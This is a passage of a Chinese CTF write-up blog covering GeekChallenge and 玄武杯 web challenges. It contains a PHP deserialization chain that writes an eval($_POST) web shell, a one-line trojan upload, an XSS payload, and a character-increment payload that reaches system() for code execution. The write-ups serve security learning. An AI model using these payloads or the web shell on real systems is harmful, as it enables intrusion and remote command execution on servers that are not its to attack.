class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span> <span class="string">&quot;secret.php&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Challenge</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$file</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">Sink</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;!!!A GREAT STEP!!!&lt;br&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Is there any file?&lt;br&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">file_exists</span>(<span class="variable">$this</span>-&gt;file))&#123;</span><br><span class="line">            <span class="keyword">global</span> <span class="variable">$FLAG</span>;</span><br><span class="line">            <span class="keyword">echo</span> <span class="variable">$FLAG</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Geek</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$a</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$b</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__unserialize</span>(<span class="params"><span class="keyword">array</span> <span class="variable">$data</span></span>): <span class="title">void</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable">$change</span>=<span class="variable">$_GET</span>[<span class="string">&quot;change&quot;</span>];</span><br><span class="line">        <span class="variable">$FUNC</span>=<span class="variable">$change</span>(<span class="variable">$data</span>);</span><br><span class="line">        <span class="variable">$FUNC</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Syclover</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$Where</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$IS</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$Starven</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$Girlfriend</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;__toString is called&lt;br&gt;&quot;</span>;</span><br><span class="line">        <span class="variable">$eee</span>=<span class="keyword">new</span> <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">Where</span>(<span class="variable">$this</span>-&gt;IS);</span><br><span class="line">        <span class="variable">$fff</span>=<span class="variable language_">$this</span>-&gt;Starven;</span><br><span class="line">        <span class="variable">$eee</span>-&gt;<span class="variable">$fff</span>(<span class="variable language_">$this</span>-&gt;Girlfriend);</span><br><span class="line">       </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">unserialize</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;data&#x27;</span>]); </span><br></pre></td></tr></table></figure>

<p>总体思想是通过implode来触发tostring方法，再到syclover类。</p>
<p>首先观察该源码考的是反射的知识点，搜索相关的原生类明显可以利用的就是InvokeArgs通过把第一个参数作为回调函数调用可以用来RCE，只需要传入数组即可。我准备写入一个文件来getshell，用蚁剑链接。</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\image-20241111203741722.png" alt="image-20241111203741722"></p>
<p>构造POC：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span> <span class="string">&quot;secret.php&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Challenge</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$file</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">Sink</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;!!!A GREAT STEP!!!&lt;br&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Is there any file?&lt;br&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">file_exists</span>(<span class="variable">$this</span>-&gt;file))&#123;</span><br><span class="line">            <span class="keyword">global</span> <span class="variable">$FLAG</span>;</span><br><span class="line">            <span class="keyword">echo</span> <span class="variable">$FLAG</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Geek</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$a</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$b</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__unserialize</span>(<span class="params"><span class="keyword">array</span> <span class="variable">$data</span></span>): <span class="title">void</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable">$change</span>=<span class="string">&quot;implode&quot;</span>;</span><br><span class="line">        <span class="variable">$FUNC</span>=<span class="variable">$change</span>(<span class="variable">$data</span>);</span><br><span class="line">        <span class="variable">$FUNC</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Syclover</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$Where</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$IS</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$Starven</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$Girlfriend</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;__toString is called&lt;br&gt;&quot;</span>;</span><br><span class="line">        <span class="variable">$eee</span>=<span class="keyword">new</span> <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">Where</span>(<span class="variable">$this</span>-&gt;IS);</span><br><span class="line">        <span class="variable">$fff</span>=<span class="variable language_">$this</span>-&gt;Starven;</span><br><span class="line">        <span class="variable">$eee</span>-&gt;<span class="variable">$fff</span>(<span class="variable language_">$this</span>-&gt;Girlfriend);</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;123321&quot;</span>;</span><br><span class="line">       </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$ex</span>=<span class="keyword">new</span> <span class="title class_">Geek</span>();</span><br><span class="line"><span class="variable">$ex</span>-&gt;a=<span class="keyword">new</span> <span class="title class_">Syclover</span>();</span><br><span class="line"><span class="variable">$ex</span>-&gt;b=<span class="keyword">new</span> <span class="title class_">Challenge</span>();</span><br><span class="line"><span class="variable">$ex</span>-&gt;b-&gt;file=<span class="string">&quot;secret.php&quot;</span>;</span><br><span class="line"><span class="variable">$ex</span>-&gt;a-&gt;Where=<span class="string">&quot;ReflectionFunction&quot;</span>;</span><br><span class="line"><span class="variable">$ex</span>-&gt;a-&gt;IS=<span class="string">&quot;system&quot;</span>;</span><br><span class="line"><span class="variable">$ex</span>-&gt;a-&gt;Starven=<span class="string">&quot;invokeArgs&quot;</span>;</span><br><span class="line"><span class="variable">$ex</span>-&gt;a-&gt;Girlfriend=<span class="keyword">array</span>(<span class="string">&#x27;echo &quot;PD9waHAgZXZhbCgkX1BPU1RbOTk5XSk7&quot; | base64 -d &gt; hack3.php&#x27;</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$ex</span>);</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>构造hack.php的内容为如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="number">999</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这是发现报错，看来只需要构造前段的标签即可。</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\c4a34f266c9a6323c0a84118b48a05cf.png" alt="c4a34f266c9a6323c0a84118b48a05cf"></p>
<p>这里修改的hack3.php内容为如下后成功上传</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="number">999</span>]);</span><br></pre></td></tr></table></figure>

<p>打开蚁剑成功链接，读取根目录发现flag文件，但是读取flag时里边是空白的，很明显没有权限</p>
<p>![屏幕截图 2024-11-11 200734](E:\Geek_WP\GeekChallenge_WriteUps.assets\屏幕截图 2024-11-11 200734.png)</p>
<p>![屏幕截图 2024-11-11 200739](E:\Geek_WP\GeekChallenge_WriteUps.assets\屏幕截图 2024-11-11 200739.png)</p>
<p>查阅文献发现file有suid权限</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\image-20241111204931117.png" alt="image-20241111204931117"></p>
<p>打开蚁剑的终端模式尝试一下直接读取，事实证明蚁剑自带的提权工具不太行，还是得使用以上方法。</p>
<p>![屏幕截图 2024-11-11 201318](E:\Geek_WP\GeekChallenge_WriteUps.assets\屏幕截图 2024-11-11 201318.png)</p>
<h2 id="SecretInDrivingSchool"><a href="#SecretInDrivingSchool" class="headerlink" title="SecretInDrivingSchool"></a>SecretInDrivingSchool</h2><p>观察网页源码：<br>得到L000G1n.php</p>
<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241108143035783.png" alt="image-20241108143035783"></p>
<p>猜测账号密码<br>admin<br>SYC@chengxing</p>
<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241108143212622.png" alt="image-20241108143212622"></p>
<p>在网站出写入代码：</p>
<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241108143234207.png" alt="image-20241108143234207"></p>
<p>由于报错了，直接删掉header写入payload<br>$ls&#x3D;phpinf();<br>echo $ls;</p>
<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241108143816156.png" alt="image-20241108143816156"></p>
<p>直接在首页phpinfo查看环境变量syc找到flag</p>
<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241108143910936.png" alt="image-20241108143910936"></p>
<h2 id="baby-upload"><a href="#baby-upload" class="headerlink" title="baby_upload"></a>baby_upload</h2><p>直接传入一句话木马传上去了，但是好像会报错，进入那个上传的地址没有显示，应该是被过滤了</p>
<p><img src="C:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241021112315879.png" alt="image-20241021112315879"></p>
<p>在文件前随便加一点文件看看是不是查看的文件头进行的过滤</p>
<p><img src="C:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241021111904548.png" alt="image-20241021111904548"></p>
<p>在传入地址找到显示，说明成果传入，利用蚁剑连接</p>
<p><img src="C:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241021112435558.png" alt="image-20241021112435558"></p>
<p>找到flag</p>
<p><img src="C:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241021112541237.png" alt="image-20241021112541237"></p>
<h2 id="Problem-On-My-Web"><a href="#Problem-On-My-Web" class="headerlink" title="Problem_On_My_Web"></a>Problem_On_My_Web</h2><p>留言板，XSS漏洞，查看留言板发现被<td></td>闭合，构造</td> <script>alert(/You've Been Tricked/)</script><td>传入后显示弹窗，代码执行成功</p>
<p><img src="C:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241023112010718.png" alt="image-20241023112010718"></p>
<p>&#x2F;manager提示用post方式提交存在问题的url获得gift，提交&#x2F;forms后显示</p>
<p><img src="C:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241023120602179.png" alt="image-20241023120602179"></p>
<p>显示127.0.0.1才能访问将POST的url值改为127.0.0.1后显示</p>
<p><img src="C:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241023122142852.png" alt="image-20241023122142852"></p>
<p>后续没有思路，再次POST此界面显示</p>
<p><img src="C:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241023125952459.png" alt="image-20241023125952459"></p>
<p>看到了后端的一些处理流程，对代码审计的过程中发现</p>
<p><img src="C:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241023130020905.png" alt="image-20241023130020905"></p>
<p>得出flag</p>
<h1 id="玄武杯"><a href="#玄武杯" class="headerlink" title="玄武杯"></a>玄武杯</h1><h2 id="EZ-SSIT"><a href="#EZ-SSIT" class="headerlink" title="EZ SSIT"></a>EZ SSIT</h2><p>flask框架查看app.py源码，是需要在hello路由下进行ssti注入</p>
<p>直接上工具一把梭！</p>
<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106185230621.png" alt="image-20241106185230621"></p>
<h2 id="EZ-SQL"><a href="#EZ-SQL" class="headerlink" title="EZ SQL"></a>EZ SQL</h2><p>首先一眼看到了非法传参，直接将参数中的第一个下划线改为[ 后被强制转换为下划线，后端的.号绕过非法参数匹配。观察到过滤了^、~就不能使用取反和异或了，这里直接使用自增绕过。</p>
<p>先看看能传入什么字符</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">for</span> (<span class="variable">$i</span>=<span class="number">32</span>;<span class="variable">$i</span>&lt;<span class="number">127</span>;<span class="variable">$i</span>++)&#123;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/[a-zA-Z0-9@#%^&amp;*:&#123;&#125;\-&lt;\?&gt;\&quot;|`~\\\\]/&quot;</span>,<span class="title function_ invoke__">chr</span>(<span class="variable">$i</span>)))&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="title function_ invoke__">chr</span>(<span class="variable">$i</span>).<span class="string">&quot; &quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://i-blog.csdnimg.cn/blog_migrate/6e7d769ec4b9151c54b48e0f485d403c.png" alt="img"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$_</span>=[]._;           <span class="comment">//$_变量，[]默认表示数组名Array，._ 表示数组名Array拼接上字符&#x27;_&#x27;</span></span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="variable">$_</span>);      <span class="comment">//输出变量内容为：&quot;Array_&quot;</span></span><br><span class="line"><span class="variable">$__</span>=<span class="variable">$_</span>[<span class="string">&#x27;!&#x27;</span>==<span class="string">&#x27;,&#x27;</span>];  <span class="comment">//里面判断结果为false，即$_[0]，即取字符串&quot;Array_&quot;[0] 下标为0的字母，即&quot;A&quot;，赋值给变量$__</span></span><br><span class="line"><span class="variable">$__</span>++;<span class="variable">$__</span>++;<span class="variable">$__</span>++; <span class="comment">//$__变量自增，值为B、C、D</span></span><br><span class="line"><span class="variable">$___</span>=++<span class="variable">$__</span>;        <span class="comment">//$___变量赋值为E，$__变量当前值为E</span></span><br><span class="line">++<span class="variable">$__</span>;             <span class="comment">//$__变量值自增，当前值为F</span></span><br><span class="line"><span class="variable">$___</span>=++<span class="variable">$__</span>.<span class="variable">$___</span>;   <span class="comment">//$__变量值自增，当前值为&quot;G&quot;,拼接变量$___的值&quot;E&quot;后，再赋值给变量$___,其值为  &quot;GE&quot;</span></span><br><span class="line">++<span class="variable">$__</span>;++<span class="variable">$__</span>;++<span class="variable">$__</span>;++<span class="variable">$__</span>;++<span class="variable">$__</span>;++<span class="variable">$__</span>;++<span class="variable">$__</span>;++<span class="variable">$__</span>;++<span class="variable">$__</span>;++<span class="variable">$__</span>;++<span class="variable">$__</span>;++<span class="variable">$__</span>; <span class="comment">//$__变量自增，值为H、I、J、K、L、M、N、O、P、Q、R、S</span></span><br><span class="line"><span class="variable">$___</span>=<span class="variable">$___</span>.++<span class="variable">$__</span>;   <span class="comment">//$__变量值自增，当前值为T，$___变量的值&quot;GE&quot;拼接&quot;T&quot;，再赋值给$___变量，其值为&quot;GET&quot;</span></span><br><span class="line"><span class="variable">$_</span>=<span class="string">&#x27;_&#x27;</span>.<span class="variable">$___</span>;       <span class="comment">//&#x27;_&#x27;拼接$___变量的值&quot;GET&quot;，后再赋值给$_变量，其值为&quot;_GET&quot;</span></span><br><span class="line"><span class="variable">$$_</span>[_](<span class="variable">$$_</span>[__]);   <span class="comment">//即组装出$_GET[_]($_GET[__])，以便get传参，参数名为_和__，如_参数传参为system，__参数传参为ls /，即get传参后拼接出system(&#x27;ls /&#x27;)命令，以便eval去执行</span></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">//post传参</span><br><span class="line">cdu[sec.wi=$_=[]._;$__=$_[&#x27;!&#x27;==&#x27;,&#x27;];$__++;$__++;$__++;$___=++$__;++$__;$___=++$__.$___;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___=$___.++$__;$_=&#x27;_&#x27;.$___;$$_[_]($$_[__]);</span><br><span class="line"> </span><br><span class="line">//get传参</span><br><span class="line">?_=system&amp;__=ls /</span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106194916970.png" alt="image-20241106194916970"></p>
<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106194943424.png" alt="image-20241106194943424"></p>
<h2 id="MISCO"><a href="#MISCO" class="headerlink" title="MISCO"></a>MISCO</h2><p>打开后看到这张图片，群里直接给了flag，谢谢群主</p>
<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106200528295.png" alt="image-20241106200528295"></p>
<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106200304227.png" alt="image-20241106200304227">1</p>
<h2 id="EZPOP"><a href="#EZPOP" class="headerlink" title="EZPOP"></a>EZPOP</h2><p>简单的反序列化</p>
<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106204312124.png" alt="image-20241106204312124"></p>
<p>构造一条链子，先查看一下phpinfo，没想到直接给flag了。。。</p>
<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106204226211.png" alt="image-20241106204226211"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://127.0.0.1:4000/2024/11/16/GeekChallenge_WriteUps/" data-id="cm3k7seg20000e8ih1d6ocaok" data-title="" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2024/11/16/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Hello World</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/11/">November 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/11/16/GeekChallenge_WriteUps/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/11/16/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>